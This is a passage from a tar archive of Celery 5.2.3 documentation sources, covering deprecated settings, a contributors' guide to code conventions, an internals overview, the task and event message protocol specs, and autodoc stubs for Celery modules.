_deprecations-v3.1: Settings ~~~~~~~~ ===================================== ===================================== **Setting name** **Replace with** ===================================== ===================================== ``CELERY_AMQP_TASK_RESULT_EXPIRES`` :setting:`result_expires` ===================================== ===================================== .. _deprecations-v2.0: Removals for version 2.0 ======================== * The following settings will be removed: ===================================== ===================================== **Setting name** **Replace with** ===================================== ===================================== `CELERY_AMQP_CONSUMER_QUEUES` `task_queues` `CELERY_AMQP_CONSUMER_QUEUES` `task_queues` `CELERY_AMQP_EXCHANGE` `task_default_exchange` `CELERY_AMQP_EXCHANGE_TYPE` `task_default_exchange_type` `CELERY_AMQP_CONSUMER_ROUTING_KEY` `task_queues` `CELERY_AMQP_PUBLISHER_ROUTING_KEY` `task_default_routing_key` ===================================== ===================================== * :envvar:`CELERY_LOADER` definitions without class name. For example,, `celery.loaders.default`, needs to include the class name: `celery.loaders.default.Loader`. * :meth:`TaskSet.run`. Use :meth:`celery.task.base.TaskSet.apply_async` instead. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/guide.rst0000664000175000017500000002061200000000000017454 0ustar00asifasif00000000000000.. _internals-guide: ================================ Contributors Guide to the Code ================================ .. contents:: :local: Philosophy ========== The API>RCP Precedence Rule --------------------------- - The API is more important than Readability - Readability is more important than Convention - Convention is more important than Performance - …unless the code is a proven hot-spot. More important than anything else is the end-user API. Conventions must step aside, and any suffering is always alleviated if the end result is a better API. Conventions and Idioms Used =========================== Classes ------- Naming ~~~~~~ - Follows :pep:`8`. - Class names must be `CamelCase`. - but not if they're verbs, verbs shall be `lower_case`: .. code-block:: python # - test case for a class class TestMyClass(Case): # BAD pass class test_MyClass(Case): # GOOD pass # - test case for a function class TestMyFunction(Case): # BAD pass class test_my_function(Case): # GOOD pass # - "action" class (verb) class UpdateTwitterStatus: # BAD pass class update_twitter_status: # GOOD pass .. note:: Sometimes it makes sense to have a class mask as a function, and there's precedence for this in the Python standard library (e.g., :class:`~contextlib.contextmanager`). Celery examples include :class:`~celery.signature`, :class:`~celery.chord`, ``inspect``, :class:`~kombu.utils.functional.promise` and more.. - Factory functions and methods must be `CamelCase` (excluding verbs): .. code-block:: python class Celery: def consumer_factory(self): # BAD ... def Consumer(self): # GOOD ... Default values ~~~~~~~~~~~~~~ Class attributes serve as default values for the instance, as this means that they can be set by either instantiation or inheritance. **Example:** .. code-block:: python class Producer: active = True serializer = 'json' def __init__(self, serializer=None, active=None): self.serializer = serializer or self.serializer # must check for None when value can be false-y self.active = active if active is not None else self.active A subclass can change the default value: .. code-block:: python TaskProducer(Producer): serializer = 'pickle' and the value can be set at instantiation: .. code-block:: pycon >>> producer = TaskProducer(serializer='msgpack') Exceptions ~~~~~~~~~~ Custom exceptions raised by an objects methods and properties should be available as an attribute and documented in the method/property that throw. This way a user doesn't have to find out where to import the exception from, but rather use ``help(obj)`` and access the exception class from the instance directly. **Example**: .. code-block:: python class Empty(Exception): pass class Queue: Empty = Empty def get(self): """Get the next item from the queue. :raises Queue.Empty: if there are no more items left. """ try: return self.queue.popleft() except IndexError: raise self.Empty() Composites ~~~~~~~~~~ Similarly to exceptions, composite classes should be override-able by inheritance and/or instantiation. Common sense can be used when selecting what classes to include, but often it's better to add one too many: predicting what users need to override is hard (this has saved us from many a monkey patch). **Example**: .. code-block:: python class Worker: Consumer = Consumer def __init__(self, connection, consumer_cls=None): self.Consumer = consumer_cls or self.Consumer def do_work(self): with self.Consumer(self.connection) as consumer: self.connection.drain_events() Applications vs. "single mode" ============================== In the beginning Celery was developed for Django, simply because this enabled us get the project started quickly, while also having a large potential user base. In Django there's a global settings object, so multiple Django projects can't co-exist in the same process space, this later posed a problem for using Celery with frameworks that don't have this limitation. Therefore the app concept was introduced. When using apps you use 'celery' objects instead of importing things from Celery sub-modules, this (unfortunately) also means that Celery essentially has two API's. Here's an example using Celery in single-mode: .. code-block:: python from celery import task from celery.task.control import inspect from .models import CeleryStats @task def write_stats_to_db(): stats = inspect().stats(timeout=1) for node_name, reply in stats: CeleryStats.objects.update_stat(node_name, stats) and here's the same using Celery app objects: .. code-block:: python from .celery import celery from .models import CeleryStats @app.task def write_stats_to_db(): stats = celery.control.inspect().stats(timeout=1) for node_name, reply in stats: CeleryStats.objects.update_stat(node_name, stats) In the example above the actual application instance is imported from a module in the project, this module could look something like this: .. code-block:: python from celery import Celery app = Celery(broker='amqp://') Module Overview =============== - celery.app This is the core of Celery: the entry-point for all functionality. - celery.loaders Every app must have a loader. The loader decides how configuration is read; what happens when the worker starts; when a task starts and ends; and so on. The loaders included are: - app Custom Celery app instances uses this loader by default. - default "single-mode" uses this loader by default. Extension loaders also exist, for example :pypi:`celery-pylons`. - celery.worker This is the worker implementation. - celery.backends Task result backends live here. - celery.apps Major user applications: worker and beat. The command-line wrappers for these are in celery.bin (see below) - celery.bin Command-line applications. :file:`setup.py` creates setuptools entry-points for these. - celery.concurrency Execution pool implementations (prefork, eventlet, gevent, solo, thread). - celery.db Database models for the SQLAlchemy database result backend. (should be moved into :mod:`celery.backends.database`) - celery.events Sending and consuming monitoring events, also includes curses monitor, event dumper and utilities to work with in-memory cluster state. - celery.execute.trace How tasks are executed and traced by the worker, and in eager mode. - celery.security Security related functionality, currently a serializer using cryptographic digests. - celery.task single-mode interface to creating tasks, and controlling workers. - t.unit (int distribution) The unit test suite. - celery.utils Utility functions used by the Celery code base. Much of it is there to be compatible across Python versions. - celery.contrib Additional public code that doesn't fit into any other name-space. Worker overview =============== * `celery.bin.worker:Worker` This is the command-line interface to the worker. Responsibilities: * Daemonization when :option:`--detach ` set, * dropping privileges when using :option:`--uid `/ :option:`--gid ` arguments * Installs "concurrency patches" (eventlet/gevent monkey patches). ``app.worker_main(argv)`` calls ``instantiate('celery.bin.worker:Worker')(app).execute_from_commandline(argv)`` * `app.Worker` -> `celery.apps.worker:Worker` Responsibilities: * sets up logging and redirects standard outs * installs signal handlers (`TERM`/`HUP`/`STOP`/`USR1` (cry)/`USR2` (rdb)) * prints banner and warnings (e.g., pickle warning) * handles the :option:`celery worker --purge` argument * `app.WorkController` -> `celery.worker.WorkController` This is the real worker, built up around bootsteps. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/index.rst0000664000175000017500000000031600000000000017465 0ustar00asifasif00000000000000.. _internals: =========== Internals =========== :Release: |version| :Date: |today| .. toctree:: :maxdepth: 2 guide deprecation worker protocol app-overview reference/index ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/protocol.rst0000664000175000017500000002325200000000000020223 0ustar00asifasif00000000000000.. _message-protocol: =================== Message Protocol =================== .. contents:: :local: .. _message-protocol-task: .. _internals-task-message-protocol: Task messages ============= .. _message-protocol-task-v2: Version 2 --------- Definition ~~~~~~~~~~ .. code-block:: python properties = { 'correlation_id': uuid task_id, 'content_type': string mimetype, 'content_encoding': string encoding, # optional 'reply_to': string queue_or_url, } headers = { 'lang': string 'py' 'task': string task, 'id': uuid task_id, 'root_id': uuid root_id, 'parent_id': uuid parent_id, 'group': uuid group_id, # optional 'meth': string method_name, 'shadow': string alias_name, 'eta': iso8601 ETA, 'expires': iso8601 expires, 'retries': int retries, 'timelimit': (soft, hard), 'argsrepr': str repr(args), 'kwargsrepr': str repr(kwargs), 'origin': str nodename, 'replaced_task_nesting': int } body = ( object[] args, Mapping kwargs, Mapping embed { 'callbacks': Signature[] callbacks, 'errbacks': Signature[] errbacks, 'chain': Signature[] chain, 'chord': Signature chord_callback, } ) Example ~~~~~~~ This example sends a task message using version 2 of the protocol: .. code-block:: python # chain: add(add(add(2, 2), 4), 8) == 2 + 2 + 4 + 8 import json import os import socket task_id = uuid() args = (2, 2) kwargs = {} basic_publish( message=json.dumps((args, kwargs, None)), application_headers={ 'lang': 'py', 'task': 'proj.tasks.add', 'argsrepr': repr(args), 'kwargsrepr': repr(kwargs), 'origin': '@'.join([os.getpid(), socket.gethostname()]) } properties={ 'correlation_id': task_id, 'content_type': 'application/json', 'content_encoding': 'utf-8', } ) Changes from version 1 ~~~~~~~~~~~~~~~~~~~~~~ - Protocol version detected by the presence of a ``task`` message header. - Support for multiple languages via the ``lang`` header. Worker may redirect the message to a worker that supports the language. - Meta-data moved to headers. This means that workers/intermediates can inspect the message and make decisions based on the headers without decoding the payload (that may be language specific, for example serialized by the Python specific pickle serializer). - Always UTC There's no ``utc`` flag anymore, so any time information missing timezone will be expected to be in UTC time. - Body is only for language specific data. - Python stores args/kwargs and embedded signatures in body. - If a message uses raw encoding then the raw data will be passed as a single argument to the function. - Java/C, etc. can use a Thrift/protobuf document as the body - ``origin`` is the name of the node sending the task. - Dispatches to actor based on ``task``, ``meth`` headers ``meth`` is unused by Python, but may be used in the future to specify class+method pairs. - Chain gains a dedicated field. Reducing the chain into a recursive ``callbacks`` argument causes problems when the recursion limit is exceeded. This is fixed in the new message protocol by specifying a list of signatures, each task will then pop a task off the list when sending the next message: .. code-block:: python execute_task(message) chain = embed['chain'] if chain: sig = maybe_signature(chain.pop()) sig.apply_async(chain=chain) - ``correlation_id`` replaces ``task_id`` field. - ``root_id`` and ``parent_id`` fields helps keep track of work-flows. - ``shadow`` lets you specify a different name for logs, monitors can be used for concepts like tasks that calls a function specified as argument: .. code-block:: python from celery.utils.imports import qualname class PickleTask(Task): def unpack_args(self, fun, args=()): return fun, args def apply_async(self, args, kwargs, **options): fun, real_args = self.unpack_args(*args) return super().apply_async( (fun, real_args, kwargs), shadow=qualname(fun), **options ) @app.task(base=PickleTask) def call(fun, args, kwargs): return fun(*args, **kwargs) .. _message-protocol-task-v1: .. _task-message-protocol-v1: Version 1 --------- In version 1 of the protocol all fields are stored in the message body: meaning workers and intermediate consumers must deserialize the payload to read the fields. Message body ~~~~~~~~~~~~ * ``task`` :`string`: Name of the task. **required** * ``id`` :`string`: Unique id of the task (UUID). **required** * ``args`` :`list`: List of arguments. Will be an empty list if not provided. * ``kwargs`` :`dictionary`: Dictionary of keyword arguments. Will be an empty dictionary if not provided. * ``retries`` :`int`: Current number of times this task has been retried. Defaults to `0` if not specified. * ``eta`` :`string` (ISO 8601): Estimated time of arrival. This is the date and time in ISO 8601 format. If not provided the message isn't scheduled, but will be executed asap. * ``expires`` :`string` (ISO 8601): .. versionadded:: 2.0.2 Expiration date. This is the date and time in ISO 8601 format. If not provided the message will never expire. The message will be expired when the message is received and the expiration date has been exceeded. * ``taskset`` :`string`: The group this task is part of (if any). * ``chord`` :`Signature`: .. versionadded:: 2.3 Signifies that this task is one of the header parts of a chord. The value of this key is the body of the cord that should be executed when all of the tasks in the header has returned. * ``utc`` :`bool`: .. versionadded:: 2.5 If true time uses the UTC timezone, if not the current local timezone should be used. * ``callbacks`` :`Signature`: .. versionadded:: 3.0 A list of signatures to call if the task exited successfully. * ``errbacks`` :`Signature`: .. versionadded:: 3.0 A list of signatures to call if an error occurs while executing the task. * ``timelimit`` :`(float, float)`: .. versionadded:: 3.1 Task execution time limit settings. This is a tuple of hard and soft time limit value (`int`/`float` or :const:`None` for no limit). Example value specifying a soft time limit of 3 seconds, and a hard time limit of 10 seconds:: {'timelimit': (3.0, 10.0)} Example message ~~~~~~~~~~~~~~~ This is an example invocation of a `celery.task.ping` task in json format: .. code-block:: javascript {"id": "4cc7438e-afd4-4f8f-a2f3-f46567e7ca77", "task": "celery.task.PingTask", "args": [], "kwargs": {}, "retries": 0, "eta": "2009-11-17T12:30:56.527191"} Task Serialization ------------------ Several types of serialization formats are supported using the `content_type` message header. The MIME-types supported by default are shown in the following table. =============== ================================= Scheme MIME Type =============== ================================= json application/json yaml application/x-yaml pickle application/x-python-serialize msgpack application/x-msgpack =============== ================================= .. _message-protocol-event: Event Messages ============== Event messages are always JSON serialized and can contain arbitrary message body fields. Since version 4.0. the body can consist of either a single mapping (one event), or a list of mappings (multiple events). There are also standard fields that must always be present in an event message: Standard body fields -------------------- - *string* ``type`` The type of event. This is a string containing the *category* and *action* separated by a dash delimiter (e.g., ``task-succeeded``). - *string* ``hostname`` The fully qualified hostname of where the event occurred at. - *unsigned long long* ``clock`` The logical clock value for this event (Lamport time-stamp). - *float* ``timestamp`` The UNIX time-stamp corresponding to the time of when the event occurred. - *signed short* ``utcoffset`` This field describes the timezone of the originating host, and is specified as the number of hours ahead of/behind UTC (e.g., -2 or +1). - *unsigned long long* ``pid`` The process id of the process the event originated in. Standard event types -------------------- For a list of standard event types and their fields see the :ref:`event-reference`. Example message --------------- This is the message fields for a ``task-succeeded`` event: .. code-block:: python properties = { 'routing_key': 'task.succeeded', 'exchange': 'celeryev', 'content_type': 'application/json', 'content_encoding': 'utf-8', 'delivery_mode': 1, } headers = { 'hostname': 'worker1@george.vandelay.com', } body = { 'type': 'task-succeeded', 'hostname': 'worker1@george.vandelay.com', 'pid': 6335, 'clock': 393912923921, 'timestamp': 1401717709.101747, 'utcoffset': -1, 'uuid': '9011d855-fdd1-4f8f-adb3-a413b499eafb', 'retval': '4', 'runtime': 0.0003212, ) ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.655754 celery-5.2.3/docs/internals/reference/0000775000175000017500000000000000000000000017562 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery._state.rst0000664000175000017500000000034200000000000023054 0ustar00asifasif00000000000000======================================== ``celery._state`` ======================================== .. contents:: :local: .. currentmodule:: celery._state .. automodule:: celery._state :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.app.annotations.rst0000664000175000017500000000040100000000000024705 0ustar00asifasif00000000000000========================================== ``celery.app.annotations`` ========================================== .. contents:: :local: .. currentmodule:: celery.app.annotations .. automodule:: celery.app.annotations :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.app.routes.rst0000664000175000017500000000034000000000000023673 0ustar00asifasif00000000000000================================= ``celery.app.routes`` ================================= .. contents:: :local: .. currentmodule:: celery.app.routes .. automodule:: celery.app.routes :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.app.trace.rst0000664000175000017500000000035700000000000023460 0ustar00asifasif00000000000000========================================== ``celery.app.trace`` ========================================== .. contents:: :local: .. currentmodule:: celery.app.trace .. automodule:: celery.app.trace :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.arangodb.rst0000664000175000017500000000041300000000000025122 0ustar00asifasif00000000000000============================================ ``celery.backends.arangodb`` ============================================ .. contents:: :local: .. currentmodule:: celery.backends.arangodb .. automodule:: celery.backends.arangodb :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.asynchronous.rst0000664000175000017500000000041300000000000026100 0ustar00asifasif00000000000000===================================== ``celery.backends.asynchronous`` ===================================== .. contents:: :local: .. currentmodule:: celery.backends.asynchronous .. automodule:: celery.backends.asynchronous :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.azureblockblob.rst0000664000175000017500000000044500000000000026352 0ustar00asifasif00000000000000================================================ ``celery.backends.azureblockblob`` ================================================ .. contents:: :local: .. currentmodule:: celery.backends.azureblockblob .. automodule:: celery.backends.azureblockblob :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.base.rst0000664000175000017500000000036300000000000024263 0ustar00asifasif00000000000000===================================== ``celery.backends.base`` ===================================== .. contents:: :local: .. currentmodule:: celery.backends.base .. automodule:: celery.backends.base :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.cache.rst0000664000175000017500000000040000000000000024404 0ustar00asifasif00000000000000=========================================== ``celery.backends.cache`` =========================================== .. contents:: :local: .. currentmodule:: celery.backends.cache .. automodule:: celery.backends.cache :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.cassandra.rst0000664000175000017500000000042600000000000025310 0ustar00asifasif00000000000000================================================ ``celery.backends.cassandra`` ================================================ .. contents:: :local: .. currentmodule:: celery.backends.cassandra .. automodule:: celery.backends.cassandra :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.consul.rst0000664000175000017500000000037500000000000024657 0ustar00asifasif00000000000000========================================== celery.backends.consul ========================================== .. contents:: :local: .. currentmodule:: celery.backends.consul .. automodule:: celery.backends.consul :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.cosmosdbsql.rst0000664000175000017500000000043400000000000025701 0ustar00asifasif00000000000000================================================ ``celery.backends.cosmosdbsql`` ================================================ .. contents:: :local: .. currentmodule:: celery.backends.cosmosdbsql .. automodule:: celery.backends.cosmosdbsql :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.couchbase.rst0000664000175000017500000000041600000000000025304 0ustar00asifasif00000000000000============================================ ``celery.backends.couchbase`` ============================================ .. contents:: :local: .. currentmodule:: celery.backends.couchbase .. automodule:: celery.backends.couchbase :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.couchdb.rst0000664000175000017500000000040600000000000024756 0ustar00asifasif00000000000000=========================================== ``celery.backends.couchdb`` =========================================== .. contents:: :local: .. currentmodule:: celery.backends.couchdb .. automodule:: celery.backends.couchdb :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.database.models.rst0000664000175000017500000000042400000000000026375 0ustar00asifasif00000000000000====================================== ``celery.backends.database.models`` ====================================== .. contents:: :local: .. currentmodule:: celery.backends.database.models .. automodule:: celery.backends.database.models :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.database.rst0000664000175000017500000000044500000000000025116 0ustar00asifasif00000000000000========================================================= ``celery.backends.database`` ========================================================= .. contents:: :local: .. currentmodule:: celery.backends.database .. automodule:: celery.backends.database :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.database.session.rst0000664000175000017500000000043300000000000026575 0ustar00asifasif00000000000000======================================== ``celery.backends.database.session`` ======================================== .. contents:: :local: .. currentmodule:: celery.backends.database.session .. automodule:: celery.backends.database.session :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.dynamodb.rst0000664000175000017500000000041100000000000025140 0ustar00asifasif00000000000000=========================================== ``celery.backends.dynamodb`` =========================================== .. contents:: :local: .. currentmodule:: celery.backends.dynamodb .. automodule:: celery.backends.dynamodb :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.elasticsearch.rst0000664000175000017500000000043000000000000026156 0ustar00asifasif00000000000000=========================================== ``celery.backends.elasticsearch`` =========================================== .. contents:: :local: .. currentmodule:: celery.backends.elasticsearch .. automodule:: celery.backends.elasticsearch :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.filesystem.rst0000664000175000017500000000041500000000000025533 0ustar00asifasif00000000000000========================================== ``celery.backends.filesystem`` ========================================== .. contents:: :local: .. currentmodule:: celery.backends.filesystem .. automodule:: celery.backends.filesystem :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.mongodb.rst0000664000175000017500000000041000000000000024767 0ustar00asifasif00000000000000============================================ ``celery.backends.mongodb`` ============================================ .. contents:: :local: .. currentmodule:: celery.backends.mongodb .. automodule:: celery.backends.mongodb :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.redis.rst0000664000175000017500000000037600000000000024463 0ustar00asifasif00000000000000========================================== ``celery.backends.redis`` ========================================== .. contents:: :local: .. currentmodule:: celery.backends.redis .. automodule:: celery.backends.redis :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.rpc.rst0000664000175000017500000000036200000000000024134 0ustar00asifasif00000000000000======================================= ``celery.backends.rpc`` ======================================= .. contents:: :local: .. currentmodule:: celery.backends.rpc .. automodule:: celery.backends.rpc :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.rst0000664000175000017500000000031600000000000023350 0ustar00asifasif00000000000000=========================== ``celery.backends`` =========================== .. contents:: :local: .. currentmodule:: celery.backends .. automodule:: celery.backends :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.s3.rst0000664000175000017500000000036500000000000023700 0ustar00asifasif00000000000000========================================== ``celery.backends.s3`` ========================================== .. contents:: :local: .. currentmodule:: celery.backends.s3 .. automodule:: celery.backends.s3 :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.concurrency.base.rst0000664000175000017500000000041600000000000025042 0ustar00asifasif00000000000000=============================================== ``celery.concurrency.base`` =============================================== .. contents:: :local: .. currentmodule:: celery.concurrency.base .. automodule:: celery.concurrency.base :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.concurrency.eventlet.rst0000664000175000017500000000046600000000000025763 0ustar00asifasif00000000000000============================================================= ``celery.concurrency.eventlet`` ============================================================= .. contents:: :local: .. currentmodule:: celery.concurrency.eventlet .. automodule:: celery.concurrency.eventlet :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.concurrency.gevent.rst0000664000175000017500000000046000000000000025417 0ustar00asifasif00000000000000============================================================= ``celery.concurrency.gevent`` ============================================================= .. contents:: :local: .. currentmodule:: celery.concurrency.gevent .. automodule:: celery.concurrency.gevent :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.concurrency.prefork.rst0000664000175000017500000000046300000000000025602 0ustar00asifasif00000000000000============================================================= ``celery.concurrency.prefork`` ============================================================= .. contents:: :local: .. currentmodule:: celery.concurrency.prefork .. automodule:: celery.concurrency.prefork :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.concurrency.rst0000664000175000017500000000034500000000000024132 0ustar00asifasif00000000000000================================== ``celery.concurrency`` ================================== .. contents:: :local: .. currentmodule:: celery.concurrency .. automodule:: celery.concurrency :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.concurrency.solo.rst0000664000175000017500000000046600000000000025111 0ustar00asifasif00000000000000=================================================================== ``celery.concurrency.solo`` =================================================================== .. contents:: :local: .. currentmodule:: celery.concurrency.solo .. automodule:: celery.concurrency.solo :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.concurrency.thread.rst0000664000175000017500000000046000000000000025376 0ustar00asifasif00000000000000============================================================= ``celery.concurrency.thread`` ============================================================= .. contents:: :local: .. currentmodule:: celery.concurrency.thread .. automodule:: celery.concurrency.thread :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.events.cursesmon.rst0000664000175000017500000000040400000000000025115 0ustar00asifasif00000000000000========================================== ``celery.events.cursesmon`` ========================================== .. contents:: :local: .. currentmodule:: celery.events.cursesmon .. automodule:: celery.events.cursesmon :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.events.dumper.rst0000664000175000017500000000037300000000000024400 0ustar00asifasif00000000000000========================================== ``celery.events.dumper`` ========================================== .. contents:: :local: .. currentmodule:: celery.events.dumper .. automodule:: celery.events.dumper :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.events.snapshot.rst0000664000175000017500000000040100000000000024733 0ustar00asifasif00000000000000========================================== ``celery.events.snapshot`` ========================================== .. contents:: :local: .. currentmodule:: celery.events.snapshot .. automodule:: celery.events.snapshot :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.platforms.rst0000664000175000017500000000034700000000000023611 0ustar00asifasif00000000000000====================================== ``celery.platforms`` ====================================== .. contents:: :local: .. currentmodule:: celery.platforms .. automodule:: celery.platforms :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.security.certificate.rst0000664000175000017500000000042000000000000025722 0ustar00asifasif00000000000000========================================== ``celery.security.certificate`` ========================================== .. contents:: :local: .. currentmodule:: celery.security.certificate .. automodule:: celery.security.certificate :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.security.key.rst0000664000175000017500000000037000000000000024234 0ustar00asifasif00000000000000========================================== ``celery.security.key`` ========================================== .. contents:: :local: .. currentmodule:: celery.security.key .. automodule:: celery.security.key :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.security.serialization.rst0000664000175000017500000000042600000000000026323 0ustar00asifasif00000000000000========================================== ``celery.security.serialization`` ========================================== .. contents:: :local: .. currentmodule:: celery.security.serialization .. automodule:: celery.security.serialization :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.security.utils.rst0000664000175000017500000000037600000000000024612 0ustar00asifasif00000000000000========================================== ``celery.security.utils`` ========================================== .. contents:: :local: .. currentmodule:: celery.security.utils .. automodule:: celery.security.utils :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.abstract.rst0000664000175000017500000000040000000000000024532 0ustar00asifasif00000000000000=========================================== ``celery.utils.abstract`` =========================================== .. contents:: :local: .. currentmodule:: celery.utils.abstract .. automodule:: celery.utils.abstract :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.collections.rst0000664000175000017500000000037400000000000025257 0ustar00asifasif00000000000000==================================== ``celery.utils.collections`` ==================================== .. currentmodule:: celery.utils.collections .. contents:: :local: .. automodule:: celery.utils.collections :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.deprecated.rst0000664000175000017500000000040400000000000025033 0ustar00asifasif00000000000000========================================== ``celery.utils.deprecated`` ========================================== .. contents:: :local: .. currentmodule:: celery.utils.deprecated .. automodule:: celery.utils.deprecated :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.dispatch.rst0000664000175000017500000000037400000000000024540 0ustar00asifasif00000000000000========================================= ``celery.utils.dispatch`` ========================================= .. contents:: :local: .. currentmodule:: celery.utils.dispatch .. automodule:: celery.utils.dispatch :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.dispatch.signal.rst0000664000175000017500000000044700000000000026015 0ustar00asifasif00000000000000==================================================== ``celery.utils.dispatch.signal`` ==================================================== .. contents:: :local: .. currentmodule:: 